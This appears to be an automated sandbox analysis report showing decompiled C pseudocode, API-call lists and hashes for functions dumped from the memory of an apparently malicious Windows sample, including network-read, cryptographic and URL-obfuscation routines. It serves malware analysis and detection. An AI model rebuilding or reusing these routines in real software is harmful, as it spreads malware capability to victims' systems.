                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: d4a70c40a4e7aefb458c9f4613e5bfbf4b3f380a6b485817176b6ea6b3885537
                                • Instruction ID: cdfa27ce0fb4e0f8de0dd822be102ab070d91e27661b62df6429222ae77a01b4
                                • Opcode Fuzzy Hash: d4a70c40a4e7aefb458c9f4613e5bfbf4b3f380a6b485817176b6ea6b3885537
                                • Instruction Fuzzy Hash: C7F017B0B4A3019FD7208FA5A819B253BB5E704742F0CA61BE546C62F0FB7A9905DF25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616C6D, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E04616C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x461a2d4; // 0xdad5a8
					_t5 = _t102 + 0x461b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x46192b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x461a2d4; // 0xdad5a8
												_t28 = _t108 + 0x461b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x461a2d4; // 0xdad5a8
														_t33 = _t78 + 0x461b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                0x04616c72
                                0x04616c7b
                                0x04616c7c
                                0x04616c80
                                0x04616c86
                                0x04616c8c
                                0x04616c95
                                0x04616c9b
                                0x04616ca5
                                0x04616ca7
                                0x04616cad
                                0x04616cb2
                                0x04616cbd
                                0x04616cc5
                                0x04616cc8
                                0x04616deb
                                0x04616cce
                                0x04616cce
                                0x04616cdb
                                0x04616ce1
                                0x04616ce7
                                0x04616ceb
                                0x04616cf1
                                0x04616cfe
                                0x04616d02
                                0x04616d08
                                0x04616d0b
                                0x04616d11
                                0x04616d17
                                0x04616d1d
                                0x04616d20
                                0x04616d23
                                0x04616d29
                                0x04616d32
                                0x04616d38
                                0x04616d39
                                0x04616d3c
                                0x04616d3d
                                0x04616d3e
                                0x04616d46
                                0x04616d47
                                0x04616d48
                                0x04616d4a
                                0x04616d4e
                                0x04616d52
                                0x00000000
                                0x00000000
                                0x04616d58
                                0x04616d61
                                0x04616d67
                                0x04616d71
                                0x04616d75
                                0x04616d77
                                0x04616d84
                                0x04616d88
                                0x04616d90
                                0x04616d95
                                0x04616da7
                                0x04616da9
                                0x04616daf
                                0x04616daf
                                0x04616db8
                                0x04616db8
                                0x04616dba
                                0x04616dc0
                                0x04616dc0
                                0x04616dc3
                                0x04616dc9
                                0x04616dcc
                                0x04616dd5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04616dd5
                                0x04616d29
                                0x04616d23
                                0x04616d0b
                                0x04616ddb
                                0x04616ddb
                                0x04616de1
                                0x04616de1
                                0x04616de7
                                0x04616de7
                                0x04616df0
                                0x04616df6
                                0x04616df6
                                0x04616cb2
                                0x04616dff

                                APIs
                                • SysAllocString.OLEAUT32(046192B0), ref: 04616CBD
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04616D9F
                                • SysFreeString.OLEAUT32(00000000), ref: 04616DB8
                                • SysFreeString.OLEAUT32(?), ref: 04616DE7
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: a1ef3bb21bbdf8c2faf199e7f044d10e291b3d292178ecc0a080b5cfa3f1ff51
                                • Instruction ID: a22b884949daab374c5ef261e0eaf187434cd918948ba6b71898f15664504db5
                                • Opcode Fuzzy Hash: a1ef3bb21bbdf8c2faf199e7f044d10e291b3d292178ecc0a080b5cfa3f1ff51
                                • Instruction Fuzzy Hash: 86514D75D00519EFCB00DFA8C4888AEB7B9EF89705B188599E915AB325E771AD01CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04615D93, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E04615D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E046128F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04611000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04613915(_t101,  &_v428, _a8, _t96 - _t81);
					E04613915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04611000(_t101, 0x461a188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04611000(_a16, _a4);
						E04613B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04617D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04617D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0461679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04615AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04614A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x461a188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x04615d96
                                0x04615da2
                                0x04615da8
                                0x04615dad
                                0x04615db1
                                0x04615f23
                                0x04615f27
                                0x04615f27
                                0x04615db7
                                0x04615dbb
                                0x04615dc1
                                0x04615dc2
                                0x04615dcd
                                0x04615dd3
                                0x04615dd8
                                0x04615ddb
                                0x04615df5
                                0x04615e04
                                0x04615e10
                                0x04615e1a
                                0x04615e1f
                                0x04615e21
                                0x04615e24
                                0x04615edb
                                0x04615ee1
                                0x04615ef2
                                0x04615f05
                                0x04615f1b
                                0x00000000
                                0x04615f20
                                0x04615e2d
                                0x04615e34
                                0x04615e38
                                0x04615e3e
                                0x04615e40
                                0x04615e42
                                0x04615e44
                                0x04615e46
                                0x04615e50
                                0x04615e55
                                0x04615e57
                                0x04615e59
                                0x04615e5a
                                0x04615e5b
                                0x04615e5c
                                0x04615e63
                                0x04615e6a
                                0x04615e6d
                                0x04615e6d
                                0x04615e3a
                                0x04615e3a
                                0x04615e3a
                                0x04615e75
                                0x04615e7d
                                0x04615e89
                                0x04615e8e
                                0x04615e8e
                                0x04615e93
                                0x00000000
                                0x00000000
                                0x04615e95
                                0x04615e98
                                0x04615ea5
                                0x00000000
                                0x00000000
                                0x04615ea7
                                0x04615ea7
                                0x04615eb4
                                0x04615e8e
                                0x04615e93
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04615e93
                                0x04615ebe
                                0x04615ec1
                                0x04615ec4
                                0x04615ecb
                                0x04615ecb
                                0x04615ed8
                                0x00000000
                                0x04615ed8
                                0x04615dc4
                                0x04615dc8
                                0x04615dc9
                                0x04615dcb
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04615dcb
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04615E46
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04615E5C
                                • memset.NTDLL ref: 04615F05
                                • memset.NTDLL ref: 04615F1B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 83a40d4125a26c50bc35f53a47ca39633ef7d9ea3a0fd50ed58fe4132194735b
                                • Instruction ID: 62645211a564c789ed3cbcab4b9502719f5f8fc27f4b9368d85593c87c96f882
                                • Opcode Fuzzy Hash: 83a40d4125a26c50bc35f53a47ca39633ef7d9ea3a0fd50ed58fe4132194735b
                                • Instruction Fuzzy Hash: 8F41A531A00219BFEB10DE68DC80BDEB775EF85354F184569B906972A0FB70BE448B44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046114A8, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 66%
                                			E046114A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				char* _t45;
				intOrPtr _t46;
				intOrPtr* _t47;
				char _t49;
				char* _t54;
				long _t55;
				intOrPtr* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t77;

				_t71 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t71;
					_pop(_t72);
					_t73 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t73 + 0x18)), _t42, _t67, _t72, _t60, _t77);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t73 + 0x30)) = 0;
						} else {
							_t45 =  &_v24;
							_push(_t45);
							_push(1);
							_push(0);
							E0461A144();
							if(_t45 != 0) {
								_v8 = 8;
							} else {
								_t46 = E04616837(0x1000);
								_v20 = _t46;
								if(_t46 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t49 = _v12;
											if(_t49 >= 0x1000) {
												_t49 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t73 + 0x18)), _v20, _t49,  &_v16);
											if(_t49 == 0) {
												break;
											}
											_t56 = _v24;
											 *((intOrPtr*)( *_t56 + 0x10))(_t56, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x461a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t54 =  &_v12;
												__imp__( *((intOrPtr*)(_t73 + 0x18)), _t54);
												if(_t54 != 0) {
													goto L19;
												} else {
													_t55 = GetLastError();
													_v8 = _t55;
													if(_t55 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E046150CA(_v20);
											if(_v8 == 0) {
												_v8 = E046137FC(_v24, _t73);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t47 = _v24;
								 *((intOrPtr*)( *_t47 + 8))(_t47);
							}
						}
					}
					return _v8;
				} else {
					_t59 = E046125C7(__eax);
					if(_t59 != 0) {
						return _t59;
					} else {
						goto L2;
					}
				}
			}


























                                0x046114a9
                                0x046114af
                                0x046114ba
                                0x046114ba
                                0x046114bc
                                0x04615aff
                                0x04615b02
                                0x04615b0b
                                0x04615b0e
                                0x04615b11
                                0x04615b19
                                0x04615c17
                                0x04615c22
                                0x04615c25
                                0x04615c27
                                0x00000000
                                0x04615c27
                                0x04615b1f
                                0x04615b22
                                0x04615c2a
                                0x04615c2a
                                0x04615b28
                                0x04615b28
                                0x04615b2b
                                0x04615b2c
                                0x04615b2e
                                0x04615b2f
                                0x04615b37
                                0x04615c0e
                                0x04615b3d
                                0x04615b43
                                0x04615b4a
                                0x04615b4d
                                0x04615bfc
                                0x04615b53
                                0x00000000
                                0x04615b53
                                0x04615b53
                                0x04615b53
                                0x04615b53
                                0x04615b58
                                0x04615b5a
                                0x04615b5a
                                0x04615b67
                                0x04615b6f
                                0x00000000
                                0x00000000
                                0x04615b71
                                0x04615b7e
                                0x04615b84
                                0x04615b84
                                0x04615b87
                                0x00000000
                                0x00000000
                                0x04615b89
                                0x04615b94
                                0x04615ba8
                                0x04615bde
                                0x04615baa
                                0x04615baa
                                0x04615bb1
                                0x04615bb9
                                0x00000000
                                0x04615bbb
                                0x04615bbb
                                0x04615bc6
                                0x04615bc9
                                0x04615bd0
                                0x00000000
                                0x04615bd0
                                0x04615bc9
                                0x04615bb9
                                0x04615be1
                                0x04615be4
                                0x04615bec
                                0x04615bf7
                                0x04615bf7
                                0x00000000
                                0x04615bec
                                0x04615b91
                                0x00000000
                                0x04615bd3
                                0x04615bd3
                                0x00000000
                                0x04615bdc
                                0x04615c03
                                0x04615c03
                                0x04615c09
                                0x04615c09
                                0x04615b37
                                0x04615b22
                                0x04615c34
                                0x046114b1
                                0x046114b1
                                0x046114b8
                                0x046114c3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x046114b8

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,04617134,00000000,?), ref: 04615B9B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04617134,00000000,?,?), ref: 04615BBB
                                  • Part of subcall function 046125C7: wcstombs.NTDLL ref: 04612687
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLastObjectSingleWaitwcstombs
                                • String ID:
                                • API String ID: 2344289193-0
                                • Opcode ID: 36831479f8b033067a16d0222591de89303a72d69708f10c2887bc80ddf6e07f
                                • Instruction ID: ead89b90efae0d10babd648ec5a53c805c612bde855bb1ab966ceb0d36c18b38
                                • Opcode Fuzzy Hash: 36831479f8b033067a16d0222591de89303a72d69708f10c2887bc80ddf6e07f
                                • Instruction Fuzzy Hash: 83413CB4A00209FFDF10DFA5C9949ADF7B8EB44345F1844AEE502E2260F734AE44DB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046152E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E046152E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x461a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x461a2a8; // 0xc9377106
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x461a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x046152ed
                                0x046152f0
                                0x046152f6
                                0x0461530e
                                0x04615312
                                0x04615315
                                0x04615317
                                0x0461531a
                                0x0461531c
                                0x0461531f
                                0x04615321
                                0x04615321
                                0x04615323
                                0x0461532e
                                0x04615333
                                0x04615344
                                0x0461534c
                                0x04615351
                                0x04615354
                                0x04615357
                                0x04615359
                                0x0461535f
                                0x04615362
                                0x04615362
                                0x04615362
                                0x0461536d
                                0x04615372
                                0x0461537c

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046162E0,00000000,?,00000000,046170D9,00000000,053C9630), ref: 046152F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04615308
                                • memcpy.NTDLL(00000000,053C9630,-00000008,?,?,?,046162E0,00000000,?,00000000,046170D9,00000000,053C9630), ref: 0461534C
                                • memcpy.NTDLL(00000001,053C9630,00000001,046170D9,00000000,053C9630), ref: 0461536D
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 21a3b62edb3b9f810899702ec7ec99bc3a773527c1081cb9864386418a6e796f
                                • Instruction ID: 551972dafe7ba13f3ab9e05e37ccd82280fe28f4d82ac6c5ac3137aff5a5a521
                                • Opcode Fuzzy Hash: 21a3b62edb3b9f810899702ec7ec99bc3a773527c1081cb9864386418a6e796f
                                • Instruction Fuzzy Hash: 6A110A72A00114BFD710CB69DC84D5EBBBEDB90350B0D016AF40597260F6B59E04C790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0461578C, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E0461578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04616837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x46192a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x46192a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                0x04615797
                                0x0461579b
                                0x0461579d
                                0x0461579e
                                0x046157a6
                                0x046157a6
                                0x046157aa
                                0x00000000
                                0x00000000
                                0x046157a1
                                0x046157a2
                                0x046157a5
                                0x046157a5
                                0x046157b2
                                0x046157b9
                                0x046157bd
                                0x046157c5
                                0x046157cb
                                0x046157cd
                                0x046157d2
                                0x046157d6
                                0x046157d8
                                0x046157db
                                0x046157e2
                                0x046157e2
                                0x046157ec
                                0x046157ef
                                0x046157f2
                                0x046157f2
                                0x046157fe
                                0x046157fe
                                0x0461580b

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,053C962C,?,?,?,04611128,053C962C,?,?,046155D3), ref: 046157A6
                                • StrTrimA.SHLWAPI(?,046192A4,00000002,?,?,?,04611128,053C962C,?,?,046155D3), ref: 046157C5
                                • StrChrA.SHLWAPI(?,00000020,?,?,?,04611128,053C962C,?,?,046155D3,?,?,?,?,?,04616BD8), ref: 046157D0
                                • StrTrimA.SHLWAPI(00000001,046192A4,?,?,?,04611128,053C962C,?,?,046155D3,?,?,?,?,?,04616BD8), ref: 046157E2
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 9fb47bd645cc7b45f884de3c4af2c107dd677358fb88043f9432a5f3dc56b066
                                • Instruction ID: 2a4e3f1ab9fead06390ed8bbf4a3442c1988f0cd99a959ae338ad314f63c69f2
                                • Opcode Fuzzy Hash: 9fb47bd645cc7b45f884de3c4af2c107dd677358fb88043f9432a5f3dc56b066
                                • Instruction Fuzzy Hash: 5201B571605321AFD3208E69DC4AE3BFB98EFD6BA0F190519F842C7360FB64D801C6A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04615076, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04615076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x461a2c4; // 0x2fc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x461a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x461a2c4; // 0x2fc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x461a290; // 0x4fd0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x04615076
                                0x0461507d
                                0x046150c7
                                0x046150c9
                                0x046150c9
                                0x04615081
                                0x04615087
                                0x0461508c
                                0x04615090
                                0x04615096
                                0x0461509d
                                0x00000000
                                0x00000000
                                0x0461509f
                                0x046150a4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x046150a4
                                0x046150a6
                                0x046150ae
                                0x046150b1
                                0x046150b1
                                0x046150b7
                                0x046150be
                                0x046150c1
                                0x046150c1
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(000002FC,00000001,046156C9), ref: 04615081
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04615090
                                • CloseHandle.KERNEL32(000002FC), ref: 046150B1
                                • HeapDestroy.KERNEL32(04FD0000), ref: 046150C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: b9b3a20e9ad9a95858aca7988be558b759c68c2f166c0fb3818cdb5884bed7fe
                                • Instruction ID: 7122d7eeb1264972ddc4aed2d64abbb9b96620600bfcd90a3db98c67e0e3b89d
                                • Opcode Fuzzy Hash: b9b3a20e9ad9a95858aca7988be558b759c68c2f166c0fb3818cdb5884bed7fe
                                • Instruction Fuzzy Hash: 13F03771B01311ABD7205EB4D94CB5677A8EB54713B0C1155BC05D72B4FB2DEC04C9A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046110DD, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E046110DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x461a37c; // 0x53c9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x461a37c; // 0x53c9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x461a030) {
					HeapFree( *0x461a290, 0, _t8);
				}
				_t14[1] = E0461578C(_v0, _t14);
				_t11 =  *0x461a37c; // 0x53c9630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                0x046110dd
                                0x046110dd
                                0x046110e6
                                0x046110f6
                                0x046110f6
                                0x046110fb
                                0x04611100
